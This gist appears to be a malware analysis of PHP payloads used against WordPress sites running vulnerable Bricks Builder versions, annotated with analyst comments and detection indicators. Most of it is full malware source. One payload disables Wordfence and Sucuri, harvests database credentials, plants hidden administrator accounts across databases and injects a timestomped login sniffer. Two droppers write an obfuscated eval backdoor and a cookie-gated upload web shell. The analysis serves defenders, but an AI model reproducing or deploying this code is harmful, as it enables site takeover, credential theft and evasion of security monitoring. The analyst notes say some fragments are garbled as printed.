@lynt-smitka
Last active March 7, 2024 16:01
Bricks Builder <1.9.6.1 Malware
<?php
// Analyst note: the first thing the payload does is silence PHP itself -
// no error display, no error log, reporting level 0 - so that failures in
// the routines below leave nothing behind in the host's logs. The leading
// `@` additionally hides any notice raised by these ini_set calls.
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
/**
 * Returns a pseudo-random alphanumeric string of $length characters.
 *
 * The 62-char alphabet is assigned to $x inside the argument list, repeated
 * enough times to cover $length, shuffled with str_shuffle() (not a CSPRNG)
 * and cut to $length characters starting at offset 1. Used for the 56-char
 * sniffer key in gwi() and the 8-char password of the planted user in awu().
 *
 * @param int $length number of characters requested (default 10)
 * @return string
 */
function genstr($length = 10)
{
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length);
}
/**
 * Analyst note: per-directory infection routine. For a candidate document
 * root $dr it (1) checks for WordPress via wp-includes/version.php,
 * (2) neutralises Sucuri and Wordfence by renaming their plugin entry files,
 * (3) scrapes database credentials and the table prefix out of wp-config.php,
 * (4) calls awu() to plant an administrator account directly in the database
 * and (5) calls sws() to patch a credential sniffer into wp-includes/pluggable.php.
 *
 * @param string $dr directory to test and infect
 * @param array  $aa by-reference de-duplication map shared across calls; awu()
 *                   keys it by host + DB user + DB password + DB name + domain
 * @return array|null the collected record (host, version, credentials, planted
 *                    users, plugin and sniffer status) or NULL when $dr is not WordPress
 */
function gwi($dr, &$aa)
{
// Not WordPress (or unreadable): skip. The include pulls $wp_version into local scope.
if (!file_exists("$dr/wp-includes/version.php")) return NULL;
if (!@include("$dr/wp-includes/version.php")) return NULL;
$cd = array();
$cd['host'] = "none";
// "_" + 56 random chars; this becomes the cookie name and XOR key of the sniffer in sws().
$cd['auth_key'] = "_" . genstr(56);
$cd['name'] = "wordpress";
$cd['docroot'] = $dr;
$cd['ver'] = "";
$cd['db_login'] = "";
$cd['db_passwd'] = "";
$cd['db_name'] = "";
$cd['db_host'] = "";
$cd['db_prefix'] = "";
$cd["wf_status"] = "none";
$cd["wf2_status"] = "none";
$cd["se_status"] = "none";
$cd["users"] = Array();
// Security plugins are disabled by renaming their entry file to
// <file>backup<random digits>, e.g. wordfence/wordfence.phpbackup12345 (constructed).
// Detection: plugin .php files carrying a "backup" + digits suffix; Wordfence/Sucuri
// suddenly reporting as not installed.
$bp = $dr . "/wp-content/plugins/";
$ntd = array("se_status" => "sucuri-scanner/sucuri.php",
"wf_status" => "wordfence/wordfence.php", "wf2_status" => "wordfence/waf/bootstrap.php");
foreach ($ntd as $name=>$pg) {
if (is_file($bp . $pg)) {
@rename($bp . $pg, $bp . $pg . "backup" . rand());
// The outcome is reported back so the operator knows whether the plugin still runs.
if (is_file($bp . $pg)) {
$cd[$name] = "cantdisable";
} else {
$cd[$name] = "disabled";
}
}
}
if (!isset($wp_version)) {
$wp_version = "unknown";
}
// Credential harvest: every define('NAME', 'value') pair in wp-config.php.
// NOTE(review): the regex literals in this function are printed without their
// string delimiters (probably lost when the sample was pasted); as shown they
// would not parse.
$cnt = @file_get_contents("$dr/wp-config.php");
preg_match_all(/(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/, $cnt, $m);
if (is_array($m)) {
// stristr() is a case-insensitive substring test, so DB_NAME etc. match these lower-case needles.
for ($i = 0; $i < count($m[2]); $i++) {
if (stristr($m[2][$i], "db_name")) {
$cd['db_name'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_user")) {
$cd['db_login'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_password")) {
$cd['db_passwd'] = $m[4][$i];
} elseif (stristr($m[2][$i], "db_host")) {
$cd['db_host'] = $m[4][$i];
}
}
}
// $table_prefix from wp-config.php; awu() uses it to recognise this site's own tables.
preg_match_all(/table_prefix\s*=\s*['"](.*)['"];/, $cnt, $m);
if (is_array($m)) {
$cd['db_prefix'] = $m[1][0];
}
$cd['ver'] = $wp_version;
// Order matters: awu() consumes the credentials and prefix, sws() then patches
// pluggable.php and adds its status to the same record that is serialised at the end.
$cd = awu($cd, $aa);
return sws($dr, $cd);
}
/**
 * Analyst note: installs a login-credential sniffer into wp-includes/pluggable.php.
 *
 * Two snippets are spliced into the file:
 *  - $pd is inserted immediately before the line beginning "$ignore_codes = array".
 *    That string appears to belong to WordPress's wp_authenticate(), where
 *    $username, $password and $user are in scope (verify against the WordPress
 *    version at hand). For every login that is not a WP_Error it XORs
 *    "password<TAB>username<TAB>siteurl" with the auth key, hex-encodes the result
 *    and appends it both to a file named by the first 8 hex chars of md5(auth_key)
 *    and to the wp_options entry 'wpsdt4_license_key'.
 *  - $pa is appended at the end of the file: a request carrying a cookie whose name
 *    is the auth key echoes the collected lines and exits.
 * The original mtime is restored with touch(), so mtime-based change monitoring will
 * not flag the edit; compare file hashes against a clean WordPress release instead.
 *
 * Detection: pluggable.php containing "line ^ str_repeat" or a `$csrf = "..."`
 * literal that is not in core; an option named wpsdt4_license_key; a file whose
 * name is 8 hex characters. The dump path is relative, so where it lands depends
 * on the working directory of the PHP process handling the login (presumably the
 * site root - confirm on the affected host).
 *
 * The heredoc label BASE64decoded looks like the gist author's marker for a blob
 * that was base64-encoded in the original sample.
 *
 * @param string $docroot WordPress root
 * @param array  $cd      record built in gwi(); its 'auth_key' seeds the sniffer
 * @return array $cd with 'sniffer_status' set to "already", "installed" or "error"
 *               (and 'auth_key' replaced by the pre-existing key when "already")
 */
function sws($docroot, $cd)
{
$rep = "\$ignore_codes = array";
$pd = <<< BASE64decoded
if (!is_wp_error($user))
{
$csrf = "{AUTHKEY}";
$line = $password . "\t" . $username . "\t" . get_site_url();
$line = $line ^ str_repeat($csrf, (strlen($line) / strlen($csrf)) + 1);
$line = bin2hex($line);
$lines = @file("{DUMPFILE}", FILE_IGNORE_NEW_LINES);
$lines[] = $line;
@file_put_contents("{DUMPFILE}", implode("\n", array_unique($lines)));
$lines = get_option('wpsdt4_license_key');
$lines = explode("\n", $lines);
$lines[] = $line;
$lines = array_unique($lines);
update_option('wpsdt4_license_key', implode("\n", array_unique($lines)));
}
BASE64decoded;
$pa = <<< BASE64decoded
if (isset($_COOKIE["{AUTHKEY}"]))
{
$lines = get_option( 'wpsdt4_license_key' );
if (!empty($lines))
{
$lines = @file_get_contents("{DUMPFILE}");
}
echo $lines;
exit();
}
BASE64decoded;
$pf = "$docroot/wp-includes/pluggable.php";
$pc = @file_get_contents($pf);
// Idempotency: if a previous run already patched this file, recover its key
// (so the dump stays readable) and report "already" instead of patching twice.
if (strpos($pc, "line ^ str_repeat") !== FALSE) {
preg_match_all(/\$csrf\s=\s\"(\w{20,})\";/, $pc, $m);
if (is_array($m))
{
$cd["auth_key"] = $m[1][0];
}
$cd["sniffer_status"] = "already";
return $cd;
}
$au = $cd["auth_key"];
// Dump-file name: first 8 hex chars of md5(auth_key).
$df = substr(md5($au), 0, 8);
$pd = str_replace("{AUTHKEY}", $au, $pd);
$pd = str_replace("{DUMPFILE}", $df, $pd);
$pa = str_replace("{AUTHKEY}", $au, $pa);
$pa = str_replace("{DUMPFILE}", $df, $pa);
// Timestomping: stat() before the write, touch() afterwards to put the original mtime back.
$ot = @stat($pf);
$src = @file_get_contents($pf);
$src = str_replace($rep, $pd . "\r\n" . $rep, $src);
$src = $src . "\r\n" . $pa;
@file_put_contents($pf, $src);
@touch($pf, $ot["mtime"]);
// Verification: the key must now occur in the file, otherwise report "error".
if (strpos(@file_get_contents($pf), $au) !== FALSE) {
$cd["sniffer_status"] = "installed";
} else {
$cd["sniffer_status"] = "error";
}
return $cd;
}
/**
 * Analyst note: plants an administrator account in every WordPress database the
 * harvested credentials can reach, bypassing the application entirely.
 *
 * With the db_* values scraped from wp-config.php it connects via mysqli, runs
 * SHOW DATABASES and, in each database, looks for tables whose name contains
 * "usermeta". The text before "usermeta" is taken as the table prefix, the site
 * URL is read from <prefix>options, and unless a user_login LIKE 'wpcron%'
 * already exists a user "wpcron" + 8 hex chars with a random 8-char password
 * (stored as a bare MD5, a format WordPress's password check has historically
 * accepted for legacy users) is INSERTed together with the usermeta rows
 * <prefix>capabilities = a:1:{s:13:"administrator";s:1:"1";} and
 * <prefix>user_level = 10. The plaintext password is kept in $cd['users'] and
 * leaves with the final serialised result.
 *
 * Because the DB account may see sibling databases on shared hosting, one leaked
 * wp-config.php can compromise other sites on the same server.
 *
 * Detection: users rows with user_login LIKE 'wpcron%' or
 * user_registered = '1979-01-01 00:00:00'; unexpected administrator capabilities
 * rows in usermeta; SHOW DATABASES and cross-schema queries from the web DB user
 * in query logs. Mitigation: least-privilege DB accounts scoped to one schema.
 *
 * @param array $cd record from gwi() (db_name, db_login, db_passwd, db_host, db_prefix)
 * @param array $aa by-reference set keyed by host+user+pass+dbname+domain; a site
 *                  already handled in this run is skipped
 * @return array $cd with 'host' (domain of the site whose prefix equals db_prefix)
 *               and 'users' (siteurl, login, plaintext password) filled in
 */
function awu($cd, &$aa)
{
$dbn = $cd['db_name'];
$dbu = $cd['db_login'];
$dbp = $cd['db_passwd'];
$dh = $cd['db_host'];
$dpfx = $cd['db_prefix'];
// Only proceeds when wp-config.php yielded a database name.
if (!empty($dbn)) {
// DB_HOST may carry an explicit port ("host:port"); default is 3306.
if (strpos($dh, ":") !== FALSE) {
$hp = explode(":", $dh);
$h1 = $hp[0];
$port = intval($hp[1]);
} else {
$h1 = $dh;
$port = 3306;
}
if ($conn = mysqli_connect($h1, $dbu, $dbp, $dbn, $port)) {
// Enumerates every database visible to the account, not just $dbn.
$result = mysqli_query($conn, "SHOW DATABASES;");
$dbs = Array();
while($rw = mysqli_fetch_array($result, MYSQLI_NUM))
{
$dbs[] = $rw;
}
foreach ($dbs as $cdb) {
$cdb = $cdb[0];
// Vestigial condition; every database is processed.
if (TRUE) {
mysqli_select_db($conn, $cdb);
$result2 = mysqli_query($conn, "SHOW TABLES;");
$tab = Array();
while($rw = mysqli_fetch_array($result2, MYSQLI_NUM))
{
$tab[] = $rw;
}
foreach ($tab as $wct) {
$wct = $wct[0];
// A "*usermeta" table marks a WordPress install; the prefix is whatever precedes it.
$ppos = strpos($wct, "usermeta");
if ($ppos !== FALSE) {
$pfx = substr($wct, 0, $ppos);
$result3 = mysqli_query($conn, "SELECT option_value FROM " . $pfx . "options WHERE option_name='siteurl';");
$su = mysqli_fetch_array($result3, MYSQLI_NUM);
if (count($su)) {
$su = $su[0];
// Domain part of siteurl, with a leading "www." stripped.
$do = explode("/", $su);
$do = $do[2];
$do = str_replace("www.", "", $do);
// 'host' is only recorded for the install whose prefix matches this site's wp-config.php.
if ($dpfx === $pfx)
{
$cd['host'] = $do;
}
// Databases that already hold a wpcron* user are left alone (break leaves the table loop).
$ra = mysqli_query($conn, "SELECT * FROM " . $pfx . "users WHERE user_login LIKE 'wpcron%';");
if (mysqli_num_rows($ra))
{
break;
}
// De-duplication across the whole run: same host/credentials/domain is handled once.
$ck = $h1 . $dbu . $dbp . $dbn . $do;
if (isset($aa[$ck]))
{
continue;
}
$aa[$ck] = TRUE;
// Login "wpcron" + 8 hex chars of md5(time()); password is 8 random chars, stored as md5.
$usern = 'wpcron' . substr(md5(time()), 0, 8);
$pp = genstr(8);
$pass = md5($pp);
// Three statements: user row (fixed registration date 1979-01-01), administrator
// capabilities, user_level 10 - then commit.
mysqli_query($conn, "INSERT INTO $pfx" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$usern', '$pass', '$usern', 0, '$usern', '1979-01-01 00:00:00');");
mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();");
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');");
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "user_level', '10');");
mysqli_commit($conn);
// Recorded for exfiltration: site URL, login and the plaintext password.
$cd["users"][] = Array($su, $usern, $pp);
}
}
}
}
}
mysqli_close($conn);
}
}
return $cd;
}
/**
 * Lists the entries of $dir as full paths.
 *
 * With $od = TRUE (the default, and the only way it is called below) only
 * subdirectories are returned; with $od = FALSE every entry except "." and ".."
 * is returned. Unreadable directories yield an empty array. Used by the
 * discovery loop to walk neighbouring sites.
 *
 * @param string $dir directory to list; a one-character path (e.g. "/") is kept as is,
 *                    otherwise trailing slashes and backslashes are trimmed
 * @param bool   $od  TRUE = directories only
 * @return array list of paths
 */
function list_dir($dir, $od=TRUE)
{
$res = Array();
$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
$h = @opendir($dir);
if ($h === FALSE) {
return $res;
}
while (($f = readdir($h)) !== FALSE) {
if ($f !== '.' and $f !== '..') {
$tmp = "$dir/$f";
if ($od) {
if (@is_dir($tmp)) {
$res[] = $tmp;
}
}
else{
$res[] = $tmp;
}
}
}
closedir($h);
return $res;
}
// Analyst note: target discovery across the whole host, not just this site.
// $aq collects every ancestor of DOCUMENT_ROOT up to the filesystem root; $bd
// then gathers the subdirectories of each ancestor and of those subdirectories
// (two levels). On shared hosting this makes every neighbouring vhost the web
// user can read a candidate for gwi(), which is the main cross-site risk here.
$bd = Array();
$aq = Array();
$cd = $_SERVER["DOCUMENT_ROOT"];
// dirname("/") returns "/" again, which is what ends the loop.
while ($cd = @dirname($cd)) {
if ($cd == $aq[count($aq) - 1]) {
break;
}
$aq[] = $cd;
}
foreach ($aq as $cd) {
if (!in_array($cd, $bd)) {
$l1 = list_dir($cd);
foreach ($l1 as $l1d)
{
$bd = array_merge($bd, list_dir($l1d));
}
$bd = array_merge($bd, $l1);
}
}
$bd = array_unique(array_merge($aq, $bd));
$aa = Array();
$res = Array();
// Every candidate directory goes through gwi(); non-WordPress directories return NULL.
foreach ($bd as $dc)
{
$tmp = gwi($dc, $aa);
if ($tmp)
{
$res[] = $tmp;
}
}
// Result hand-off: the serialised records (credentials, planted users, sniffer keys)
// are echoed between "{MARK}" delimiters, apparently a placeholder filled in by the
// operator's tooling so a client can cut the payload out of the HTTP response.
// A response body holding a rawurlencoded serialised array between two identical
// marker tokens is a usable network-side indicator.
echo "{MARK}" . rawurlencode(serialize($res)) . "{MARK}";
exit();
<?php
// Analyst note: start of the second sample, a dropper that writes a stager
// (see $evaluaor and $filename below). The escaped double quotes throughout
// this fragment suggest it was lifted out of a JSON or string-encoded payload;
// as printed it would not parse. These two guards only make the script
// portable across PHP builds.
if(!defined(\"PHP_EOL\"))
{
define(\"PHP_EOL\", \"\n\");
}
if(!defined(\"DIRECTORY_SEPARATOR\"))
{
define(\"DIRECTORY_SEPARATOR\", \"/\");
}
/**
 * Returns $length characters drawn with rand() from a fixed letters-only alphabet.
 *
 * Letters only, because the output is used below as the XOR key and as PHP
 * variable/function names spliced into the stager template; rand() makes this
 * non-cryptographic - it only needs to differ from run to run.
 *
 * @param int $length default 12
 * @return string
 */
function generateRandomStringEval($length = 12)
{
$characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
/**
 * Returns $length lower-case alphanumeric characters drawn with rand().
 *
 * Called once below with 35 to produce the per-deployment key that replaces the
 * UUID-looking constant in the backdoor template and is echoed back in the
 * "ONDOK#" response.
 *
 * @param int $length default 10
 * @return string
 */
function generateRndString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
/**
 * Returns a random lower-case alphanumeric file name with a .php suffix.
 *
 * Same generator as generateRndString() plus ".php". In this sample it is only
 * referenced from a commented-out line, i.e. the randomised file name option was
 * left in but not used - the dropper writes a fixed name instead.
 *
 * @param int $length default 10 (characters before ".php")
 * @return string
 */
function generateRandomString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString . \".php\";
}
/**
 * XOR-obfuscates $snippet and urlencodes the result for embedding in the stager.
 *
 * Byte i is XORed with $template[$i % $xor_number], so only the first
 * $xor_number characters of the key are ever used. The inverse, _remove_action,
 * lives in the $evaluaor template below. This is encoding, not encryption: its
 * only purpose is to keep the backdoor source out of the dropped file in plain
 * text, which is why static signatures on the backdoor body will not match the
 * stager.
 *
 * @param string $snippet    text to encode
 * @param string $template   key material
 * @param int    $xor_number how many leading key characters to cycle through
 * @return string urlencoded XOR output
 */
function _add_action($snippet, $template, $xor_number)
{
$splitted = str_split($snippet);
$action = \"\";
for ($i = 0; $i < strlen($snippet);$i++) {
$action .= $splitted[$i] ^ $template[$i%$xor_number];
}
$action = urlencode($action);
return $action;
}
/**
 * Derives the web root from SCRIPT_FILENAME by cutting off the REQUEST_URI suffix.
 *
 * Falls back to DOCUMENT_ROOT when REQUEST_URI is not found in SCRIPT_FILENAME,
 * and to "/" when it is found at offset 0. Decides where the stager file is
 * written, so the dropped file ends up directly in the site's document root.
 *
 * @return string directory path
 */
function GetDocRoot()
{
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
if ($docroot_end === FALSE)
{
return $_SERVER['DOCUMENT_ROOT'];
}
elseif ($docroot_end === 0)
{
return \"/\";
}
else
{
return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
}
// Analyst note: $origin_backdoor is the source of the backdoor that the stager
// materialises on each request. Readable from the template: every cookie and
// POST field is base64-decoded, XORed (shdp) first with the key below and then
// with the field name, and passed to unserialize(); if the result has a key
// 'ak', action 'i' echoes a serialised array with the PHP version and
// 'sv' => '1.0-1', action 'e' eval()s the 'd' member. A GET parameter named
// 673435 answers md5(47712) - a liveness check. Error logging and execution
// time limits are switched off first.
// The UUID-looking key is replaced per deployment (see $new_pass), so detection
// should key on structural strings instead: "function shdp", "die(md5(47712))",
// "$_GET[673435]", "'sv' => '1.0-1'", or unserialize() applied to
// array_merge($_COOKIE, $_POST).
$origin_backdoor = <<< BASE64decoded
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
function shdp($data, $key)
{
$out_data = "";
for ($i = 0; $i < strlen($data);) {
for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
if (isset($_GET[673435]))
{
die(md5(47712));
}
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
$data = @unserialize(shdp(shdp(base64_decode($data), '4ef63abe-1abd-45a6-913d-6fb99657e24b'), $data_key));
if (isset($data['ak'])) {
if ($data['a'] == 'i') {
$i = array(
'pv' => @phpversion(),
'sv' => '1.0-1',
);
echo @serialize($i);
} elseif ($data['a'] == 'e') {
eval($data['d']);
}
exit();
}
}
BASE64decoded;
// Per-deployment 35-char key; it is echoed back to the operator in the UROK# line below.
$new_pass = generateRndString(35);
$origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor );
// Analyst note: $evaluaor is the template of the stager that actually lands on
// disk (see $filename below). At request time it urldecodes and XOR-decodes two
// blobs - the backdoor source and the function name "file_put_contents" - calls
// that function to write the backdoor to a file named by the XOR key,
// include_once()s it and unlink()s it. The persistent artefact is therefore the
// stager; the decoded backdoor exists on disk only for the duration of a request.
// The str_replace() calls below rename the variables and the helper, splice in
// the literal key, the integer xor_number and the encoded blobs, so each dropped
// stager differs textually from the next. Stable traits to look for: a function
// whose body XORs str_split() output against a key, a variable that is decoded
// and then called as a function, and include_once immediately followed by
// unlink on the same variable.
$evaluaor = <<< BASE64decoded
<?php
function _remove_action($snippet, $template)
{
$snippet = urldecode($snippet);
$splitted = str_split($snippet);
$action = "";
for ($i = 0; $i < strlen($snippet);$i++) {
$action .= $splitted[$i] ^ $template[$i%xor_number];
}
return $action;
}
$i="#URLENCODED_CODE#";
$j="#URLENCODED_file_put_contetnts#";
$index="#XORKEY#";
$k = _remove_action($i, $index);
$f = _remove_action($j, $index);
$f($index, $k);
include_once ($index);
unlink($index);
exit();
BASE64decoded;
// Only the first 3..12 characters of the 12-char key take part in the XOR (see _add_action()).
$xor_number=rand(3,12);
$XORKEY = generateRandomStringEval(12);
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number);
$URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number);
// Randomised identifiers for the template substitutions below.
$snippet_varname = generateRandomStringEval(rand(6,12));
$template_varname = generateRandomStringEval(rand(6,12));
$splitted_varname = generateRandomStringEval(rand(6,12));
$_remove_action_varname = generateRandomStringEval(rand(6,12));
$index_varname = generateRandomStringEval(rand(6,12));
// Substitutions are plain text replacements on the template: the bare token
// xor_number becomes the integer, #XORKEY# becomes the key (which is also the
// name of the temporary backdoor file), and the variable names are randomised.
$evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor);
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor);
$evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor);
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor);
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor);
$evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor);
$evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor);
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor);
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor);
// Re-seeds the legacy PRNG (after the rand() uses above); nothing here is
// cryptographic, the values only need to look different per run.
srand(time());
// Polyfill so the dropper still works on hosts where file_put_contents is
// unavailable - disabling that one function is not an effective control.
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) {
return false;
} else {
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
////////////////////////////////////////////////////////////////////////////////////////////
// Analyst note: name of the dropped stager. The active value is the hard-coded
// xjc6q59v.php; the commented alternatives (a random name, options-reading.php,
// wp-login.php) show the intent to blend in with WordPress core file names.
// Detection: an unexpected xjc6q59v.php (or readurl.php) in the document root;
// more generally any .php file in the web root that is not part of the install.
$filename = \"readurl.php\";
# $filename = generateRandomString();
#$filename = \"options-reading.php\";
#$filename = \"wp-login.php\";
$filename = \"xjc6q59v.php\";
# get base local and remote path
$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = GetDocRoot();
$full_payload_name = GetDocRoot() . \"/$filename\";
$good = FALSE;
// Writes the stager; on success reports "UROK#http://<file>#ONDOK#<key>#ENDP"
// (the URL part carries only the file name, not $host) and stops. These response
// markers, and the STATUS_CANTUPLOAD / CCCURL strings below, are stable
// network-side indicators of this dropper.
if (file_put_contents($full_payload_name, $payload_file))
{
echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL;
$good=TRUE;
$good_counter++;
exit();
}
if(!$good)
echo \"URL#STATUS_CANTUPLOAD#CCCURL\";
echo \"#CCCURL\";
//unlink(\"dfaonfpfkwg.php\");
exit();?>
<?php
// Analyst note: third, simpler dropper. It writes e9a045b4ce28.php containing a
// web shell that (1) echoes 409723 * 20 (= 8194460) as a liveness/response check,
// (2) when md5 of cookie "d" equals 17028f487cb2a84607646da3ad3878ec, echoes "ok",
// eval()s base64_decode($_REQUEST["id"]) and, if POST up=up, copies the uploaded
// $_FILES["file"] to its original name in the working directory.
// Detection: the file name, the md5 constant, the literal "409723 * 20", or
// eval(base64_decode($_REQUEST[...])) anywhere under the web root.
// The quoting in this fragment appears mangled by the way the gist was saved
// (escaped outer quotes, unescaped inner ones), so treat it as a sample to read,
// not something that runs as printed.
file_put_contents(\"e9a045b4ce28.php\",\"
<?php echo 409723 * 20;
if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") {
echo "ok";
eval(base64_decode($_REQUEST["id"]));
if ($_POST["up"] == "up") {
@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
}
} ?>
\")
;exit;?>